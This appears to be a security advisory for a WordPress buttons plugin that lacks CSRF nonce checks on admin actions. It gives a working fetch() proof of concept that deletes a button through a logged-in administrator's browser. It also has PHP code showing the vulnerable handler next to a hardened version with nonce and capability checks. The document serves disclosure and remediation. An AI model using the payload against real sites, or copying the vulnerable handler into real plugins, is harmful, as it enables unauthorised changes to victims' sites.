Description

The plugin does not perform CSRF checks (WordPress nonce verification) on some of its admin actions, such as the button deletion shown below. An attacker who can get a logged-in administrator to visit a page they control can therefore make the victim's browser submit these actions with the victim's cookies, performing them without the administrator's intent.
Proof of Concept

Make a logged-in admin open a page containing the code below, where example.com is the vulnerable site and <> is the id of an existing button:

    fetch("https://example.com/wp-admin/admin.php?page=simple-buttons", {
        "headers": {
            "content-type": "application/x-www-form-urlencoded",
        },
        "method": "POST",
        "body": 'method=delete&id=<>',
        "credentials": "include"
    }).then(response => response.text())
      .then(data => console.log(data));

Note that the request carries no _wpnonce parameter and is still processed. From a cross-origin page the browser will not let the script read the response (the promise is rejected by CORS), so the console.log only fires when testing from the same origin; the deletion has already happened server-side by then. Whether the victim's cookies are attached to the cross-site POST also depends on the browser's SameSite cookie handling.
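The fix for this class of issue in a WordPress plugin is to tie every state-changing admin request to a nonce and to verify it before acting. The following is an added, illustrative example written for this page, not the plugin's own code: it reconstructs the vulnerable pattern described above beside a hardened version. The handler names, the option name simple_buttons_items and the nonce action string simple_buttons_delete_<id> are assumptions; only the WordPress API calls (wp_nonce_field, check_admin_referer, current_user_can, get_option, update_option) are real.

```php
<?php
// Added illustrative example, not the plugin's own code. The function names,
// the option name and the nonce action string are assumptions for this page.

// Vulnerable pattern: the handler trusts any POST that reaches the admin page.
// A logged-in admin who visits an attacker's page sends this request with
// their cookies, and the button is deleted without their intent.
function simple_buttons_handle_request_vulnerable() {
    if ( ! isset( $_POST['method'] ) || 'delete' !== $_POST['method'] ) {
        return;
    }
    $id      = (int) $_POST['id'];
    $buttons = get_option( 'simple_buttons_items', array() );
    unset( $buttons[ $id ] );
    update_option( 'simple_buttons_items', $buttons );
}

// Hardened pattern, part 1: the delete form carries a nonce bound to the
// action and to the specific button id, so a token for one button cannot be
// replayed against another.
function simple_buttons_delete_form( $id ) {
    $id = (int) $id;
    echo '<form method="post" action="' . esc_url( admin_url( 'admin.php?page=simple-buttons' ) ) . '">';
    wp_nonce_field( 'simple_buttons_delete_' . $id ); // emits _wpnonce and _wp_http_referer
    echo '<input type="hidden" name="method" value="delete">';
    echo '<input type="hidden" name="id" value="' . $id . '">';
    submit_button( 'Delete', 'delete' );
    echo '</form>';
}

// Hardened pattern, part 2: the handler refuses the request unless the user
// is authorised AND the nonce verifies. A cross-site page cannot supply a
// valid nonce because it is derived from the victim's session, so the
// request from the proof of concept above dies before anything is deleted.
function simple_buttons_handle_request_hardened() {
    if ( ! isset( $_POST['method'] ) || 'delete' !== $_POST['method'] ) {
        return;
    }
    $id = isset( $_POST['id'] ) ? (int) $_POST['id'] : 0;

    // Capability check first: a nonce proves intent, not permission.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }

    // check_admin_referer() verifies $_POST['_wpnonce'] against the action
    // string and calls wp_die() if it is missing, stale or for another id.
    check_admin_referer( 'simple_buttons_delete_' . $id );

    $buttons = get_option( 'simple_buttons_items', array() );
    if ( isset( $buttons[ $id ] ) ) {
        unset( $buttons[ $id ] );
        update_option( 'simple_buttons_items', $buttons );
    }
}
```

The two checks are deliberately separate: check_admin_referer() only proves that the request originated from a form the site itself rendered for this user, so a capability check is still needed to stop a low-privileged user who can legitimately obtain a nonce. The same pattern applies to any other state-changing action the page handles; a delete reachable by GET would need the same nonce and is even easier to trigger, since a plain link or image tag suffices.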